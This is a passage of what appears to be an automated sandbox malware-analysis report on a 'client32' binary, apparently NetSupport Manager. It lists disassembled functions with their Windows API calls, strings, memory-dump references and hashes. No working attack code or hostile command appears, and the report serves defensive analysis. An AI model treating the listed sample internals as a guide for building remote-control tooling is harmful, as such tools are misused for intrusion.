                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DebugOutputString$Xinvalid_argumentstd::_
                                                        • String ID: NsAppSystem::CNsAsException::CNsAsException
                                                        • API String ID: 3978508687-500537696
                                                        • Opcode ID: d3979ca99786bbdcf964c36c19b2760401b48af141d8562cb7bb1568ce08c8b8
                                                        • Instruction ID: 8837671011e457aa4c11cfd1fd5c4e9a0250d23fcc6e96c43e9b8becd046c5d2
                                                        • Opcode Fuzzy Hash: d3979ca99786bbdcf964c36c19b2760401b48af141d8562cb7bb1568ce08c8b8
                                                        • Instruction Fuzzy Hash: 8321BF75D04349AFDB00DFA9C880BDEFBB8EF59328F10416ED82167281DB756A04CBA1
                                                        Function 11131740 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strncpy
                                                        • String ID: ..\ctl32\util.cpp$p || !"<2Kb mem"
                                                        • API String ID: 2961919466-1642919599
                                                        • Opcode ID: a84a524e2a5a3ca184fcd3cda767411f9b22e8bd47eaacf26824eb7d4d9a3b4c
                                                        • Instruction ID: a3632db9a93471b5910d5886b4d3df24aec854f6ed9a85d08698d96db66754df
                                                        • Opcode Fuzzy Hash: a84a524e2a5a3ca184fcd3cda767411f9b22e8bd47eaacf26824eb7d4d9a3b4c
                                                        • Instruction Fuzzy Hash: 6301D63F7046552B97014959BD84EE6BBA8DBC1279B084131FE0C9B105D622E90842E1
                                                        Function 1108F080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1108F095
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
                                                          • Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E
                                                        • _memmove.LIBCMT ref: 1108F0C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                        • String ID: vector<T> too long
                                                        • API String ID: 1785806476-3788999226
                                                        • Opcode ID: 6f0b2e1c205bbd2c96d839bee56b005472a4b14bbc734a29f06d1c48f80613f6
                                                        • Instruction ID: a6d9f17f4f5abecd3a3e42e3327a60068f9e3e230c18d666d12c29c30de67088
                                                        • Opcode Fuzzy Hash: 6f0b2e1c205bbd2c96d839bee56b005472a4b14bbc734a29f06d1c48f80613f6
                                                        • Instruction Fuzzy Hash: 6001B5B5E042069FC734CEB9DC80CA7B7D9EBD4318714CA2DE55A87644EA70F801CBA1
                                                        Function 1100B560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Error. NULL capbuf, xrefs: 1100B571
                                                        • Error. preventing capbuf overflow, xrefs: 1100B596
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                        • API String ID: 0-3856134272
                                                        • Opcode ID: b51532faca43ebac7e18a9a5a26819066dfd90f60a6994718c66c64743f8ecf5
                                                        • Instruction ID: 418a5b702e0b0712c65a1007775ff8f326adea187fe23ba1f0a502aa42cbf0d9
                                                        • Opcode Fuzzy Hash: b51532faca43ebac7e18a9a5a26819066dfd90f60a6994718c66c64743f8ecf5
                                                        • Instruction Fuzzy Hash: 5901DBBAE00A0597D610CF55F840ACBB398DBC037DF04897AEA1E97201D531F59187E2
                                                        Function 11083170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102BC0: GetCurrentThreadId.KERNEL32 ref: 11102BCE
                                                          • Part of subcall function 11102BC0: EnterCriticalSection.KERNEL32(00000000,75A33760,00000000,111DBD28,?,110C3135,00000000,75A33760), ref: 11102BD8
                                                          • Part of subcall function 11102BC0: LeaveCriticalSection.KERNEL32(00000000,75A4A1D0,00000000,?,110C3135,00000000,75A33760), ref: 11102BF8
                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 110831C1
                                                          • Part of subcall function 11103060: GetCurrentThreadId.KERNEL32 ref: 11103089
                                                          • Part of subcall function 11103060: EnterCriticalSection.KERNEL32(00000000,?,1106B5D7,00000001,?), ref: 11103096
                                                          • Part of subcall function 11103060: LeaveCriticalSection.KERNEL32(00000000,?,?,?,1106B5D7), ref: 111030E2
                                                          • Part of subcall function 11083090: InterlockedDecrement.KERNEL32(00000000), ref: 11083091
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$CurrentEnterInterlockedLeaveThread$DecrementIncrement
                                                        • String ID: ..\ctl32\Errorhan.cpp$tdata
                                                        • API String ID: 572542348-657756363
                                                        • Opcode ID: f4e42414f0fbdbc5b375dfe8d0a8774ab02788612ae6362accde8ab73a6fb4c6
                                                        • Instruction ID: fed0740ed2e363c3bace71a798bb0b99693e64dd8fd0b9732b9dedd91c868084
                                                        • Opcode Fuzzy Hash: f4e42414f0fbdbc5b375dfe8d0a8774ab02788612ae6362accde8ab73a6fb4c6
                                                        • Instruction Fuzzy Hash: 06E0ED3AE0DA3F27D516A6A54C28BCFFB8A1B41A6DB404014F9286F640FC80A80082F6
                                                        Function 11095740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 11095754
                                                        • SetLastError.KERNEL32(00000078,00000000,?,110965DC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109577D
                                                        Strings
                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109574E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressErrorLastProc
                                                        • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                        • API String ID: 199729137-262600717
                                                        • Opcode ID: 7296345c72dc160559074f0e23efd7321d78c34b523c223cec433581c304b291
                                                        • Instruction ID: f0e677052f352e1d491147569a4aaef78e9149aea0f3838322468369201922be
                                                        • Opcode Fuzzy Hash: 7296345c72dc160559074f0e23efd7321d78c34b523c223cec433581c304b291
                                                        • Instruction Fuzzy Hash: 1EF08276A40228AFC320CF94E844E9BB7E8EF48721F00451AF95AD7240D671E910CBB0
                                                        Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001091
                                                        • m_hWnd, xrefs: 11001096
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2046328329-1557312927
                                                        • Opcode ID: 7af6d590896ff1dfbcac7f380829b7aab34670307aa9b842ebd1b5702f891b1a
                                                        • Instruction ID: 959fc845a7b13bf9de0acd13928d7ecdd6b58ad8c2d11ea6b61d336c87b12d71
                                                        • Opcode Fuzzy Hash: 7af6d590896ff1dfbcac7f380829b7aab34670307aa9b842ebd1b5702f891b1a
                                                        • Instruction Fuzzy Hash: A8E01AB6610219BFD314CE85EC40ED7B3ADEB48354F008519F95997240D6B0E850CBB1
                                                        Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001051
                                                        • m_hWnd, xrefs: 11001056
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 819365019-1557312927
                                                        • Opcode ID: 563ac9448ad9209c405835ae6ffe744044af7d71d485e160b5cdb4f271289dda
                                                        • Instruction ID: 4a608db799e5a9afbdf3b9bc31dfafed9475bd885bd203aecf675f076c5a0dbd
                                                        • Opcode Fuzzy Hash: 563ac9448ad9209c405835ae6ffe744044af7d71d485e160b5cdb4f271289dda
                                                        • Instruction Fuzzy Hash: 90E046B6A00219BFD210CE85DC85EDAB3ACFB58324F00C429F91987240D6B0E850CBA1
                                                        Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110010E1
                                                        • m_hWnd, xrefs: 110010E6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 906220102-1557312927
                                                        • Opcode ID: 49ceb5e28b7757a3c3378fb78ae6eab82e85225ab6ba3376b7b480bd37d390ef
                                                        • Instruction ID: b9cf230d2c9f3a88a66f013921ab9639df1a4187879fb0e609e6af44bdfe2f68
                                                        • Opcode Fuzzy Hash: 49ceb5e28b7757a3c3378fb78ae6eab82e85225ab6ba3376b7b480bd37d390ef
                                                        • Instruction Fuzzy Hash: 3DE04F76A00219BFD215CE45DC45ED6B3ACFB48314F00C429F91487640D6B0F850CBA1
                                                        Function 110153B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KillTimer.USER32(?,?), ref: 110153DB
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110153C1
                                                        • m_hWnd, xrefs: 110153C6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2229609774-1557312927
                                                        • Opcode ID: 1b926b9716b0b64936cb5e1a2271b180302512e4999b4c0638f729702118aa4d
                                                        • Instruction ID: 1d7125962cf813140b05ce340ba898871e4843448dff8cc316c5671598320007
                                                        • Opcode Fuzzy Hash: 1b926b9716b0b64936cb5e1a2271b180302512e4999b4c0638f729702118aa4d
                                                        • Instruction Fuzzy Hash: EEE04F7AA00315AFC215DA95D840E96F3A9AB58314F00C419ED5547740D775E940CBA1
                                                        Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(?,?), ref: 1100113B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001121
                                                        • m_hWnd, xrefs: 11001126
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1604732272-1557312927
                                                        • Opcode ID: 578e6b42e3a466468ed5f8b48cc10b3d5d2de952ef15857138e468b3388b4fb8
                                                        • Instruction ID: 76fc1c9f204d61b598545802c88e505d5d1a1f0333807163ca50a8fc43eda729
                                                        • Opcode Fuzzy Hash: 578e6b42e3a466468ed5f8b48cc10b3d5d2de952ef15857138e468b3388b4fb8
                                                        • Instruction Fuzzy Hash: 46D02E76A10328BFC2289A42EC01EC2F3ECAB143A8F008029FA1443240D671E840CBA1
                                                        Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KillTimer.USER32(?,?), ref: 1100102B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
